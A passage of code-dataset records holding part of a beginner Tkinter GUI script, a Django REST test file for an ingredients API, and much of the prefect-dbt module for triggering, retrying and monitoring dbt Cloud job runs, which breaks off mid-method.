padx=100, pady=100, command=myClick, fg=\"white\", bg=\"red\")\nsearch = Entry(root, fg=\"black\", bg=\"light blue\", width=25, borderwidth=5)\n\n# Pack it in\nmyLabel.pack()\nmyLabel2.pack()\nsearch.pack()\nsearch.insert(0, \"Fuck you!\")\nmyButton.pack()\n\nroot.mainloop()","repo_name":"BenRosentha1/Beginner-Projects","sub_path":"GUI Shit/guiTest.py","file_name":"guiTest.py","file_ext":"py","file_size_in_byte":845,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"39232229680","text":"\"\"\"Tests for Ingredients API.\"\"\"\nfrom django.contrib.auth import get_user_model\nfrom django.urls import reverse\nfrom django.test import TestCase\n\nfrom rest_framework import status\nfrom rest_framework.test import APIClient\n\nfrom core.models import Ingredient\nfrom recipe.serializers import IngredientSerializer\n\nINGREDIENTS_URL = reverse('recipe:ingredient-list')\n\n\ndef detail_url(ingredient_id):\n \"\"\"Create and return an ingredient URL\"\"\"\n return reverse('recipe:ingredient-detail', args=[ingredient_id])\n\n\ndef create_user(email='test@example.com', password='testpass123'):\n \"\"\"Create and return new user.\"\"\"\n return get_user_model().objects.create(email=email, password=password)\n\n\nclass PublicIngredientsApiTests(TestCase):\n \"\"\"Tests unauthenticated API requests.\"\"\"\n\n def setUp(self) -> None:\n self.client = APIClient()\n\n def test_auth_required(self):\n \"\"\"Tests auth is required for retrieving ingredients.\"\"\"\n res = self.client.get(INGREDIENTS_URL)\n\n self.assertEqual(res.status_code, status.HTTP_401_UNAUTHORIZED)\n\n\nclass PrivateIngredientsApiTests(TestCase):\n \"\"\"Tests authenticated API requests.\"\"\"\n\n def setUp(self) -> None:\n self.client = APIClient()\n # Create user and login\n self.user = create_user()\n self.client.force_authenticate(self.user)\n\n def test_auth_required(self):\n \"\"\"Tests auth is required for retrieving ingredients.\"\"\"\n # Create dummy data\n Ingredient.objects.create(user=self.user, name='Parsley')\n Ingredient.objects.create(user=self.user, name='Beef')\n\n # Send GET request\n res = self.client.get(INGREDIENTS_URL)\n\n # Check response\n self.assertEqual(res.status_code, status.HTTP_200_OK)\n\n # Query db for data and order by name\n ingredients = Ingredient.objects.all().order_by('-name')\n # Serialize to simulate API\n serialized = IngredientSerializer(ingredients, many=True)\n\n self.assertEqual(ingredients.count(), 2)\n self.assertEqual(res.data, serialized.data)\n\n def test_ingredients_limited_to_user(self):\n \"\"\"Tests list of ingredients is limited to authenticated user\"\"\"\n # Create secondary user\n new_user = create_user(email='test2@example.com',\n password='testpass231')\n # Create ingredients\n ingredient = Ingredient.objects.create(user=self.user, name='Parsley')\n Ingredient.objects.create(user=new_user, name='Beef')\n\n # Send GET request\n res = self.client.get(INGREDIENTS_URL)\n\n # Assert response is OK\n self.assertEqual(res.status_code, status.HTTP_200_OK)\n\n # Query db\n ingredients = Ingredient.objects.filter(user=self.user)\n # serialize data\n serialized = IngredientSerializer(ingredients, many=True)\n # Assert received same as db\n self.assertEqual(len(res.data), 1)\n self.assertEqual(res.data, serialized.data)\n\n def test_update_ingredient(self):\n \"\"\"Test updating an ingredient.\"\"\"\n # Create ingredient\n ingredient = Ingredient.objects.create(user=self.user, name='Bread')\n # Prepare for API call\n payload = {\n 'name': 'Breadcrumbs'\n }\n url = detail_url(ingredient.id)\n # Send PATCH request\n res = self.client.patch(url, payload)\n\n # Assert response OK\n self.assertEqual(res.status_code, status.HTTP_200_OK)\n\n # Refresh ingredient details from db\n ingredient.refresh_from_db()\n # Assert name has been changed\n self.assertEqual(ingredient.name, payload['name'])\n\n def test_delete_ingredient(self):\n \"\"\"Test deleting an ingredient.\"\"\"\n # Create ingredient\n ingredient = Ingredient.objects.create(user=self.user, name='Bread')\n # Build url for API call\n url = detail_url(ingredient.id)\n # Send DELETE request\n res = self.client.delete(url)\n\n # Assert response code OK\n self.assertEqual(res.status_code, status.HTTP_204_NO_CONTENT)\n\n # Assert that no ingredient exists\n ingredients = Ingredient.objects.filter(user=self.user)\n self.assertFalse(ingredients.exists())\n","repo_name":"dmawardi/recipe-app-api","sub_path":"app/recipe/tests/test_ingredients_api.py","file_name":"test_ingredients_api.py","file_ext":"py","file_size_in_byte":4246,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"42838389886","text":"\"\"\"Module containing tasks and flows for interacting with dbt Cloud jobs\"\"\"\nimport asyncio\nimport shlex\nimport time\nfrom json import JSONDecodeError\nfrom typing import Any, Awaitable, Callable, Dict, List, Optional, Union\n\nfrom httpx import HTTPStatusError\nfrom prefect import flow, get_run_logger, task\nfrom prefect.blocks.abstract import JobBlock, JobRun\nfrom prefect.context import FlowRunContext\nfrom prefect.utilities.asyncutils import sync_compatible\nfrom pydantic import VERSION as PYDANTIC_VERSION\n\nif PYDANTIC_VERSION.startswith(\"2.\"):\n from pydantic.v1 import Field\nelse:\n from pydantic import Field\n\nfrom typing_extensions import Literal\n\nfrom prefect_dbt.cloud.credentials import DbtCloudCredentials\nfrom prefect_dbt.cloud.exceptions import (\n DbtCloudGetJobFailed,\n DbtCloudGetRunArtifactFailed,\n DbtCloudGetRunFailed,\n DbtCloudJobRunCancelled,\n DbtCloudJobRunFailed,\n DbtCloudJobRunIncomplete,\n DbtCloudJobRunTimedOut,\n DbtCloudJobRunTriggerFailed,\n DbtCloudListRunArtifactsFailed,\n)\nfrom prefect_dbt.cloud.models import TriggerJobRunOptions\nfrom prefect_dbt.cloud.runs import (\n DbtCloudJobRunStatus,\n get_dbt_cloud_run_artifact,\n get_dbt_cloud_run_info,\n list_dbt_cloud_run_artifacts,\n wait_for_dbt_cloud_job_run,\n)\nfrom prefect_dbt.cloud.utils import extract_user_message\n\nEXE_COMMANDS = (\"build\", \"run\", \"test\", \"seed\", \"snapshot\")\n\n\n@task(\n name=\"Get dbt Cloud job details\",\n description=\"Retrieves details of a dbt Cloud job \"\n \"for the job with the given job_id.\",\n retries=3,\n retry_delay_seconds=10,\n)\nasync def get_dbt_cloud_job_info(\n dbt_cloud_credentials: DbtCloudCredentials,\n job_id: int,\n order_by: Optional[str] = None,\n) -> Dict:\n \"\"\"\n A task to retrieve information about a dbt Cloud job.\n\n Args:\n dbt_cloud_credentials: Credentials for authenticating with dbt Cloud.\n job_id: The ID of the job to get.\n\n Returns:\n The job data returned by the dbt Cloud administrative API.\n\n Example:\n Get status of a dbt Cloud job:\n ```python\n from prefect import flow\n\n from prefect_dbt.cloud import DbtCloudCredentials\n from prefect_dbt.cloud.jobs import get_job\n\n @flow\n def get_job_flow():\n credentials = DbtCloudCredentials(api_key=\"my_api_key\", account_id=123456789)\n\n return get_job(\n dbt_cloud_credentials=credentials,\n job_id=42\n )\n\n get_job_flow()\n ```\n \"\"\" # noqa\n try:\n async with dbt_cloud_credentials.get_administrative_client() as client:\n response = await client.get_job(\n job_id=job_id,\n order_by=order_by,\n )\n except HTTPStatusError as ex:\n raise DbtCloudGetJobFailed(extract_user_message(ex)) from ex\n return response.json()[\"data\"]\n\n\n@task(\n name=\"Trigger dbt Cloud job run\",\n description=\"Triggers a dbt Cloud job run for the job \"\n \"with the given job_id and optional overrides.\",\n retries=3,\n retry_delay_seconds=10,\n)\nasync def trigger_dbt_cloud_job_run(\n dbt_cloud_credentials: DbtCloudCredentials,\n job_id: int,\n options: Optional[TriggerJobRunOptions] = None,\n) -> Dict:\n \"\"\"\n A task to trigger a dbt Cloud job run.\n\n Args:\n dbt_cloud_credentials: Credentials for authenticating with dbt Cloud.\n job_id: The ID of the job to trigger.\n options: An optional TriggerJobRunOptions instance to specify overrides\n for the triggered job run.\n\n Returns:\n The run data returned from the dbt Cloud administrative API.\n\n Examples:\n Trigger a dbt Cloud job run:\n ```python\n from prefect import flow\n\n from prefect_dbt.cloud import DbtCloudCredentials\n from prefect_dbt.cloud.jobs import trigger_dbt_cloud_job_run\n\n\n @flow\n def trigger_dbt_cloud_job_run_flow():\n credentials = DbtCloudCredentials(api_key=\"my_api_key\", account_id=123456789)\n\n trigger_dbt_cloud_job_run(dbt_cloud_credentials=credentials, job_id=1)\n\n\n trigger_dbt_cloud_job_run_flow()\n ```\n\n Trigger a dbt Cloud job run with overrides:\n ```python\n from prefect import flow\n\n from prefect_dbt.cloud import DbtCloudCredentials\n from prefect_dbt.cloud.jobs import trigger_dbt_cloud_job_run\n from prefect_dbt.cloud.models import TriggerJobRunOptions\n\n\n @flow\n def trigger_dbt_cloud_job_run_flow():\n credentials = DbtCloudCredentials(api_key=\"my_api_key\", account_id=123456789)\n\n trigger_dbt_cloud_job_run(\n dbt_cloud_credentials=credentials,\n job_id=1,\n options=TriggerJobRunOptions(\n git_branch=\"staging\",\n schema_override=\"dbt_cloud_pr_123\",\n dbt_version_override=\"0.18.0\",\n target_name_override=\"staging\",\n timeout_seconds_override=3000,\n generate_docs_override=True,\n threads_override=8,\n steps_override=[\n \"dbt seed\",\n \"dbt run --fail-fast\",\n \"dbt test --fail-fast\",\n ],\n ),\n )\n\n\n trigger_dbt_cloud_job_run()\n ```\n \"\"\" # noqa\n logger = get_run_logger()\n\n logger.info(f\"Triggering run for job with ID {job_id}\")\n\n try:\n async with dbt_cloud_credentials.get_administrative_client() as client:\n response = await client.trigger_job_run(job_id=job_id, options=options)\n except HTTPStatusError as ex:\n raise DbtCloudJobRunTriggerFailed(extract_user_message(ex)) from ex\n\n run_data = response.json()[\"data\"]\n\n if \"project_id\" in run_data and \"id\" in run_data:\n logger.info(\n f\"Run successfully triggered for job with ID {job_id}. \"\n \"You can view the status of this run at \"\n f\"https://{dbt_cloud_credentials.domain}/#/accounts/\"\n f\"{dbt_cloud_credentials.account_id}/projects/{run_data['project_id']}/\"\n f\"runs/{run_data['id']}/\"\n )\n\n return run_data\n\n\n@task(\n name=\"Get dbt Cloud job run ID\",\n description=\"Extracts the run ID from a trigger job run API response\",\n)\ndef get_run_id(obj: Dict):\n \"\"\"\n Task that extracts the run ID from a trigger job run API response,\n\n This task is mainly used to maintain dependency tracking between the\n `trigger_dbt_cloud_job_run` task and downstream tasks/flows that use the run ID.\n\n Args:\n obj: The JSON body from the trigger job run response.\n\n Example:\n ```python\n from prefect import flow\n from prefect_dbt.cloud import DbtCloudCredentials\n from prefect_dbt.cloud.jobs import trigger_dbt_cloud_job_run, get_run_id\n\n\n @flow\n def trigger_run_and_get_id():\n dbt_cloud_credentials=DbtCloudCredentials(\n api_key=\"my_api_key\",\n account_id=123456789\n )\n\n triggered_run_data = trigger_dbt_cloud_job_run(\n dbt_cloud_credentials=dbt_cloud_credentials,\n job_id=job_id,\n options=trigger_job_run_options,\n )\n run_id = get_run_id.submit(triggered_run_data)\n return run_id\n\n trigger_run_and_get_id()\n ```\n \"\"\"\n id = obj.get(\"id\")\n if id is None:\n raise RuntimeError(\"Unable to determine run ID for triggered job.\")\n return id\n\n\n@flow(\n name=\"Trigger dbt Cloud job run and wait for completion\",\n description=\"Triggers a dbt Cloud job run and waits for the\"\n \"triggered run to complete.\",\n)\nasync def trigger_dbt_cloud_job_run_and_wait_for_completion(\n dbt_cloud_credentials: DbtCloudCredentials,\n job_id: int,\n trigger_job_run_options: Optional[TriggerJobRunOptions] = None,\n max_wait_seconds: int = 900,\n poll_frequency_seconds: int = 10,\n retry_filtered_models_attempts: int = 3,\n) -> Dict:\n \"\"\"\n Flow that triggers a job run and waits for the triggered run to complete.\n\n Args:\n dbt_cloud_credentials: Credentials for authenticating with dbt Cloud.\n job_id: The ID of the job to trigger.\n trigger_job_run_options: An optional TriggerJobRunOptions instance to\n specify overrides for the triggered job run.\n max_wait_seconds: Maximum number of seconds to wait for job to complete\n poll_frequency_seconds: Number of seconds to wait in between checks for\n run completion.\n retry_filtered_models_attempts: Number of times to retry models selected by `retry_status_filters`.\n\n Raises:\n DbtCloudJobRunCancelled: The triggered dbt Cloud job run was cancelled.\n DbtCloudJobRunFailed: The triggered dbt Cloud job run failed.\n RuntimeError: The triggered dbt Cloud job run ended in an unexpected state.\n\n Returns:\n The run data returned by the dbt Cloud administrative API.\n\n Examples:\n Trigger a dbt Cloud job and wait for completion as a stand alone flow:\n ```python\n import asyncio\n from prefect_dbt.cloud import DbtCloudCredentials\n from prefect_dbt.cloud.jobs import trigger_dbt_cloud_job_run_and_wait_for_completion\n\n asyncio.run(\n trigger_dbt_cloud_job_run_and_wait_for_completion(\n dbt_cloud_credentials=DbtCloudCredentials(\n api_key=\"my_api_key\",\n account_id=123456789\n ),\n job_id=1\n )\n )\n ```\n\n Trigger a dbt Cloud job and wait for completion as a sub-flow:\n ```python\n from prefect import flow\n from prefect_dbt.cloud import DbtCloudCredentials\n from prefect_dbt.cloud.jobs import trigger_dbt_cloud_job_run_and_wait_for_completion\n\n @flow\n def my_flow():\n ...\n run_result = trigger_dbt_cloud_job_run_and_wait_for_completion(\n dbt_cloud_credentials=DbtCloudCredentials(\n api_key=\"my_api_key\",\n account_id=123456789\n ),\n job_id=1\n )\n ...\n\n my_flow()\n ```\n\n Trigger a dbt Cloud job with overrides:\n ```python\n import asyncio\n from prefect_dbt.cloud import DbtCloudCredentials\n from prefect_dbt.cloud.jobs import trigger_dbt_cloud_job_run_and_wait_for_completion\n from prefect_dbt.cloud.models import TriggerJobRunOptions\n\n asyncio.run(\n trigger_dbt_cloud_job_run_and_wait_for_completion(\n dbt_cloud_credentials=DbtCloudCredentials(\n api_key=\"my_api_key\",\n account_id=123456789\n ),\n job_id=1,\n trigger_job_run_options=TriggerJobRunOptions(\n git_branch=\"staging\",\n schema_override=\"dbt_cloud_pr_123\",\n dbt_version_override=\"0.18.0\",\n target_name_override=\"staging\",\n timeout_seconds_override=3000,\n generate_docs_override=True,\n threads_override=8,\n steps_override=[\n \"dbt seed\",\n \"dbt run --fail-fast\",\n \"dbt test --fail fast\",\n ],\n ),\n )\n )\n ```\n \"\"\" # noqa\n logger = get_run_logger()\n\n triggered_run_data_future = await trigger_dbt_cloud_job_run.submit(\n dbt_cloud_credentials=dbt_cloud_credentials,\n job_id=job_id,\n options=trigger_job_run_options,\n )\n run_id = (await triggered_run_data_future.result()).get(\"id\")\n if run_id is None:\n raise RuntimeError(\"Unable to determine run ID for triggered job.\")\n\n final_run_status, run_data = await wait_for_dbt_cloud_job_run(\n run_id=run_id,\n dbt_cloud_credentials=dbt_cloud_credentials,\n max_wait_seconds=max_wait_seconds,\n poll_frequency_seconds=poll_frequency_seconds,\n )\n\n if final_run_status == DbtCloudJobRunStatus.SUCCESS:\n try:\n list_run_artifacts_future = await list_dbt_cloud_run_artifacts.submit(\n dbt_cloud_credentials=dbt_cloud_credentials,\n run_id=run_id,\n )\n run_data[\"artifact_paths\"] = await list_run_artifacts_future.result()\n except DbtCloudListRunArtifactsFailed as ex:\n logger.warning(\n \"Unable to retrieve artifacts for job run with ID %s. Reason: %s\",\n run_id,\n ex,\n )\n logger.info(\n \"dbt Cloud job run with ID %s completed successfully!\",\n run_id,\n )\n return run_data\n elif final_run_status == DbtCloudJobRunStatus.CANCELLED:\n raise DbtCloudJobRunCancelled(\n f\"Triggered job run with ID {run_id} was cancelled.\"\n )\n elif final_run_status == DbtCloudJobRunStatus.FAILED:\n while retry_filtered_models_attempts > 0:\n logger.info(\n f\"Retrying job run with ID: {run_id} \"\n f\"{retry_filtered_models_attempts} more times\"\n )\n try:\n retry_filtered_models_attempts -= 1\n run_data = await (\n retry_dbt_cloud_job_run_subset_and_wait_for_completion(\n dbt_cloud_credentials=dbt_cloud_credentials,\n run_id=run_id,\n trigger_job_run_options=trigger_job_run_options,\n max_wait_seconds=max_wait_seconds,\n poll_frequency_seconds=poll_frequency_seconds,\n )\n )\n return run_data\n except Exception:\n pass\n else:\n raise DbtCloudJobRunFailed(f\"Triggered job run with ID: {run_id} failed.\")\n else:\n raise RuntimeError(\n f\"Triggered job run with ID: {run_id} ended with unexpected\"\n f\"status {final_run_status.value}.\"\n )\n\n\nasync def _build_trigger_job_run_options(\n dbt_cloud_credentials: DbtCloudCredentials,\n trigger_job_run_options: TriggerJobRunOptions,\n run_id: str,\n run_info: Dict[str, Any],\n job_info: Dict[str, Any],\n):\n \"\"\"\n Compiles a list of steps (commands) to retry, then either build trigger job\n run options from scratch if it does not exist, else overrides the existing.\n \"\"\"\n generate_docs = job_info.get(\"generate_docs\", False)\n generate_sources = job_info.get(\"generate_sources\", False)\n\n steps_override = []\n for run_step in run_info[\"run_steps\"]:\n status = run_step[\"status_humanized\"].lower()\n # Skipping cloning, profile setup, and dbt deps - always the first three\n # steps in any run, and note, index starts at 1 instead of 0\n if run_step[\"index\"] <= 3 or status == \"success\":\n continue\n # get dbt build from \"Invoke dbt with `dbt build`\"\n command = run_step[\"name\"].partition(\"`\")[2].partition(\"`\")[0]\n\n # These steps will be re-run regardless if\n # generate_docs or generate_sources are enabled for a given job\n # so if we don't skip, it'll run twice\n freshness_in_command = (\n \"dbt source snapshot-freshness\" in command\n or \"dbt source freshness\" in command\n )\n if \"dbt docs generate\" in command and generate_docs:\n continue\n elif freshness_in_command and generate_sources:\n continue\n\n # find an executable command like `build` or `run`\n # search in a list so that there aren't false positives, like\n # `\"run\" in \"dbt run-operation\"`, which is True; we actually want\n # `\"run\" in [\"dbt\", \"run-operation\"]` which is False\n command_components = shlex.split(command)\n for exe_command in EXE_COMMANDS:\n if exe_command in command_components:\n break\n else:\n exe_command = \"\"\n\n is_exe_command = exe_command in EXE_COMMANDS\n is_not_success = status in (\"error\", \"skipped\", \"cancelled\")\n is_skipped = status == \"skipped\"\n if (not is_exe_command and is_not_success) or (is_exe_command and is_skipped):\n # if no matches like `run-operation`, we will be rerunning entirely\n # or if it's one of the expected commands and is skipped\n steps_override.append(command)\n else:\n # errors and failures are when we need to inspect to figure\n # out the point of failure\n try:\n run_artifact_future = await get_dbt_cloud_run_artifact.with_options(\n retries=0, retry_delay_seconds=0\n ).submit(\n dbt_cloud_credentials=dbt_cloud_credentials,\n run_id=run_id,\n path=\"run_results.json\",\n step=run_step[\"index\"],\n )\n run_artifact = await run_artifact_future.result()\n except JSONDecodeError:\n # get the run results scoped to the step which had an error\n # an error here indicates that either:\n # 1) the fail-fast flag was set, in which case\n # the run_results.json file was never created; or\n # 2) there was a problem on dbt Cloud's side saving\n # this artifact\n steps_override.append(command)\n else:\n # we only need to find the individual nodes for those run commands\n run_results = run_artifact[\"results\"]\n # select nodes that were not successful\n # note \"fail\" here instead of \"cancelled\" because\n # nodes do not have a cancelled state\n run_nodes = \" \".join(\n run_result[\"unique_id\"].split(\".\")[2]\n for run_result in run_results\n if run_result[\"status\"] in (\"error\", \"skipped\", \"fail\")\n )\n\n select_arg = None\n if \"-s\" in command_components:\n select_arg = \"-s\"\n elif \"--select\" in command_components:\n select_arg = \"--select\"\n\n # prevent duplicate --select/-s statements\n if select_arg is not None:\n # dbt --fail-fast run, -s, bad_mod --vars '{\"env\": \"prod\"}' to:\n # dbt --fail-fast run -s other_mod bad_mod --vars '{\"env\": \"prod\"}'\n command_start, select_arg, command_end = command.partition(\n select_arg\n )\n modified_command = (\n f\"{command_start} {select_arg} {run_nodes} {command_end}\"\n )\n else:\n # dbt --fail-fast, build, --vars '{\"env\": \"prod\"}' to:\n # dbt --fail-fast build --select bad_model --vars '{\"env\": \"prod\"}'\n dbt_global_args, exe_command, exe_args = command.partition(\n exe_command\n )\n modified_command = (\n f\"{dbt_global_args} {exe_command} -s {run_nodes} {exe_args}\"\n )\n steps_override.append(modified_command)\n\n if trigger_job_run_options is None:\n trigger_job_run_options_override = TriggerJobRunOptions(\n steps_override=steps_override\n )\n else:\n trigger_job_run_options_override = trigger_job_run_options.copy()\n trigger_job_run_options_override.steps_override = steps_override\n return trigger_job_run_options_override\n\n\n@flow(\n name=\"Retry subset of dbt Cloud job run and wait for completion\",\n description=(\n \"Retries a subset of dbt Cloud job run, filtered by select statuses, \"\n \"and waits for the triggered retry to complete.\"\n ),\n)\nasync def retry_dbt_cloud_job_run_subset_and_wait_for_completion(\n dbt_cloud_credentials: DbtCloudCredentials,\n run_id: int,\n trigger_job_run_options: Optional[TriggerJobRunOptions] = None,\n max_wait_seconds: int = 900,\n poll_frequency_seconds: int = 10,\n) -> Dict:\n \"\"\"\n Flow that retrys a subset of dbt Cloud job run, filtered by select statuses,\n and waits for the triggered retry to complete.\n\n Args:\n dbt_cloud_credentials: Credentials for authenticating with dbt Cloud.\n trigger_job_run_options: An optional TriggerJobRunOptions instance to\n specify overrides for the triggered job run.\n max_wait_seconds: Maximum number of seconds to wait for job to complete\n poll_frequency_seconds: Number of seconds to wait in between checks for\n run completion.\n run_id: The ID of the job run to retry.\n\n Raises:\n ValueError: If `trigger_job_run_options.steps_override` is set by the user.\n\n Returns:\n The run data returned by the dbt Cloud administrative API.\n\n Examples:\n Retry a subset of models in a dbt Cloud job run and wait for completion:\n ```python\n from prefect import flow\n\n from prefect_dbt.cloud import DbtCloudCredentials\n from prefect_dbt.cloud.jobs import retry_dbt_cloud_job_run_subset_and_wait_for_completion\n\n @flow\n def retry_dbt_cloud_job_run_subset_and_wait_for_completion_flow():\n credentials = DbtCloudCredentials.load(\"MY_BLOCK_NAME\")\n retry_dbt_cloud_job_run_subset_and_wait_for_completion(\n dbt_cloud_credentials=credentials,\n run_id=88640123,\n )\n\n retry_dbt_cloud_job_run_subset_and_wait_for_completion_flow()\n ```\n \"\"\" # noqa\n if trigger_job_run_options and trigger_job_run_options.steps_override is not None:\n raise ValueError(\n \"Do not set `steps_override` in `trigger_job_run_options` \"\n \"because this flow will automatically set it\"\n )\n\n run_info_future = await get_dbt_cloud_run_info.submit(\n dbt_cloud_credentials=dbt_cloud_credentials,\n run_id=run_id,\n include_related=[\"run_steps\"],\n )\n run_info = await run_info_future.result()\n\n job_id = run_info[\"job_id\"]\n job_info_future = await get_dbt_cloud_job_info.submit(\n dbt_cloud_credentials=dbt_cloud_credentials,\n job_id=job_id,\n )\n job_info = await job_info_future.result()\n\n trigger_job_run_options_override = await _build_trigger_job_run_options(\n dbt_cloud_credentials=dbt_cloud_credentials,\n trigger_job_run_options=trigger_job_run_options,\n run_id=run_id,\n run_info=run_info,\n job_info=job_info,\n )\n\n # to circumvent `RuntimeError: The task runner is already started!`\n flow_run_context = FlowRunContext.get()\n task_runner_type = type(flow_run_context.task_runner)\n\n run_data = await trigger_dbt_cloud_job_run_and_wait_for_completion.with_options(\n task_runner=task_runner_type()\n )(\n dbt_cloud_credentials=dbt_cloud_credentials,\n job_id=job_id,\n retry_filtered_models_attempts=0,\n trigger_job_run_options=trigger_job_run_options_override,\n max_wait_seconds=max_wait_seconds,\n poll_frequency_seconds=poll_frequency_seconds,\n )\n return run_data\n\n\nclass DbtCloudJobRun(JobRun): # NOT A BLOCK\n \"\"\"\n Class that holds the information and methods to interact\n with the resulting run of a dbt Cloud job.\n \"\"\"\n\n def __init__(self, run_id: int, dbt_cloud_job: \"DbtCloudJob\"):\n self.run_id = run_id\n self._dbt_cloud_job = dbt_cloud_job\n self._dbt_cloud_credentials = dbt_cloud_job.dbt_cloud_credentials\n\n @property\n def _log_prefix(self):\n return f\"dbt Cloud job {self._dbt_cloud_job.job_id} run {self.run_id}.\"\n\n async def _wait_until_state(\n self,\n in_final_state_fn: Awaitable[Callable],\n get_state_fn: Awaitable[Callable],\n log_state_fn: Callable = None,\n timeout_seconds: int = 60,\n interval_seconds: int = 1,\n ):\n \"\"\"\n Wait until the job run reaches a specific state.\n\n Args:\n in_final_state_fn: An async function that accepts a run state\n and returns a boolean indicating whether the job run is\n in a final state.\n get_state_fn: An async function that returns\n the current state of the job run.\n log_state_fn: A callable that accepts a run\n state and makes it human readable.\n timeout_seconds: The maximum amount of time, in seconds, to wait\n for the job run to reach the final state.\n interval_seconds: The number of seconds to wait between checks of\n the job run's state.\n \"\"\"\n start_time = time.time()\n last_state = run_state = None\n while not in_final_state_fn(run_state):\n run_state = await get_state_fn()\n if run_state != last_state:\n if self.logger is not None:\n self.logger.info(\n \"%s has new state: %s\",\n self._log_prefix,\n log_state_fn(run_state),\n )\n last_state = run_state\n\n elapsed_time_seconds = time.time() - start_time\n if elapsed_time_seconds > timeout_seconds:\n raise DbtCloudJobRunTimedOut(\n f\"Max wait time of {timeout_seconds} \"\n \"seconds exceeded while waiting\"\n )\n await asyncio.sleep(interval_seconds)\n\n @sync_compatible\n async def get_run(self) -> Dict[str, Any]:\n \"\"\"\n Makes a request to the dbt Cloud API to get the run data.\n\n Returns:\n The run data.\n \"\"\"\n try:\n dbt_cloud_credentials = self._dbt_cloud_credentials\n async with dbt_cloud_credentials.get_administrative_client() as client:\n response = await client.get_run(self.run_id)\n except HTTPStatusError as ex:\n raise DbtCloudGetRunFailed(extract_user_message(ex)) from ex\n run_data = response.json()[\"data\"]\n return run_data\n\n @sync_compatible\n async def get_status_code(self) -> int:\n \"\"\"\n Makes a request to the dbt Cloud API to get the run status.\n\n Returns:\n The run status code.\n \"\"\"\n run_data = await self.get_run()\n run_status_code = run_data.get(\"status\")\n return run_status_code\n\n @sync_compatible\n async def wait_for_completion(self) -> None:\n \"\"\"\n Waits for the job run to reach a terminal state.\n \"\"\"\n await self._wait_until_state(\n in_final_state_fn=DbtCloudJobRunStatus.is_terminal_status_code,\n get_state_fn=self.get_status_code,\n log_state_fn=DbtCloudJobRunStatus,\n timeout_seconds=self._dbt_cloud_job.timeout_seconds,\n interval_seconds=self._dbt_cloud_job.interval_seconds,\n )\n\n @sync_compatible\n async def fetch_result(self, step: Optional[int] = None) -> Dict[str, Any]:\n \"\"\"\n Gets the results from the job run. Since the results\n may not be ready, use wait_for_completion before calling this method.\n\n Args:\n step: The index of the step in the run to query for artifacts. The\n first step in the run has the index 1. If the step parameter is\n omitted, then this method will return the artifacts compiled\n for the last step in the run.\n \"\"\"\n run_data = await self.get_run()\n run_status = DbtCloudJobRunStatus(run_data.get(\"status\"))\n if run_status == DbtCloudJobRunStatus.SUCCESS:\n try:\n async with self._dbt_cloud_credentials.get_administrative_client() as client: # noqa\n response = await client.list_run_artifacts(\n run_id=self.run_id, step=step\n )\n run_data[\"artifact_paths\"] = response.json()[\"data\"]\n self.logger.info(\"%s completed successfully!\", self._log_prefix)\n except HTTPStatusError as ex:\n raise DbtCloudListRunArtifactsFailed(extract_user_message(ex)) from ex\n return run_data\n elif run_status == DbtCloudJobRunStatus.CANCELLED:\n raise DbtCloudJobRunCancelled(f\"{self._log_prefix} was cancelled.\")\n elif run_status == DbtCloudJobRunStatus.FAILED:\n raise DbtCloudJobRunFailed(f\"{self._log_prefix} has failed.\")\n else:\n raise DbtCloudJobRunIncomplete(\n f\"{self._log_prefix} is still running; \"\n \"use wait_for_completion() to wait until results are ready.\"\n )\n\n @sync_compatible\n async def get_run_artifacts(\n self,\n path: Literal[\"manifest.json\", \"catalog.json\", \"run_results.json\"],\n step: Optional[int] = None,\n ) -> Union[Dict[str, Any], str]:\n \"\"\"\n Get an artifact generated for a completed run.\n\n Args:\n path: The relative path to the run artifact.\n step: The index of the step in the run to query for artifacts. The\n first step in the run has the index 1. If the step parameter is\n omitted, then this method will return the artifacts compiled\n for the last step in the run.\n\n Returns:\n The contents of the requested manifest. Returns a `Dict` if the\n requested artifact is a JSON file and a `str` otherwise.\n \"\"\"\n try:\n dbt_cloud_credentials = self._dbt_cloud_credentials\n async with dbt_cloud_credentials.get_administrative_client() as client:\n response = await client.get_run_artifact(\n run_id=self.run_id, path=path, step=step\n )\n except HTTPStatusError as ex:\n raise DbtCloudGetRunArtifactFailed(extract_user_message(ex)) from ex\n\n if path.endswith(\".json\"):\n artifact_contents = response.json()\n else:\n artifact_contents = response.text\n return artifact_contents\n\n def _select_unsuccessful_commands(\n self,\n run_results: List[Dict[str, Any]],\n command_components: List[str],\n command: str,\n exe_command: str,\n ) -> List[str]:\n \"\"\"\n Select nodes that were not successful and rebuild a command.\n \"\"\"\n # note \"fail\" here instead of \"cancelled\" because\n # nodes do not have a cancelled state\n run_nodes = \" \".join(\n run_result[\"unique_id\"].split(\".\")[2]\n for run_result in run_results\n if run_result[\"status\"] in (\"error\", \"skipped\", \"fail\")\n )\n\n select_arg = None\n if \"-s\" in command_components:\n select_arg = \"-s\"\n elif \"--select\" in command_components:\n select_arg = \"--select\"\n\n # prevent duplicate --select/-s statements\n if select_arg is not None:\n # dbt --fail-fast run, -s, bad_mod --vars '{\"env\": \"prod\"}' to:\n # dbt --fail-fast run -s other_mod bad_mod --vars '{\"env\": \"prod\"}'\n command_start, select_arg, command_end = command.partition(select_arg)\n modified_command = (\n f\"{command_start} {select_arg} {run_nodes} {command_end}\" # noqa\n )\n else:\n # dbt --fail-fast, build, --vars '{\"env\": \"prod\"}' to:\n # dbt --fail-fast build --select bad_model --vars '{\"env\": \"prod\"}'\n dbt_global_args, exe_command, exe_args = command.partition(exe_command)\n modified_command = (\n f\"{dbt_global_args} {exe_command} -s {run_nodes} {exe_args}\"\n )\n return modified_command\n\n async def _build_trigger_job_run_options(\n self,\n job: Dict[str, Any],\n run: Dict[str, Any],\n ) -> TriggerJobRunOptions:\n \"\"\"\n Compiles a list of steps (commands) to retry, then either build trigger job\n run options from scratch if it does not exist, else overrides the existing.\n \"\"\"\n generate_docs = job.get(\"generate_docs\", False)\n generate_sources = job.get(\"generate_sources\", False)\n\n steps_override = []\n for run_step in run[\"run_steps\"]:\n status = run_step[\"status_humanized\"].lower()\n # Skipping cloning, profile setup, and dbt deps - always the first three\n # steps in any run, and note, index starts at 1 instead of 0\n if run_step[\"index\"] <= 3 or status == \"success\":\n continue\n # get dbt build from \"Invoke dbt with `dbt build`\"\n command = run_step[\"name\"].partition(\"`\")[2].partition(\"`\")[0]\n\n # These steps will be re-run regardless if\n # generate_docs or generate_sources are enabled for a given job\n # so if we don't skip, it'll run twice\n 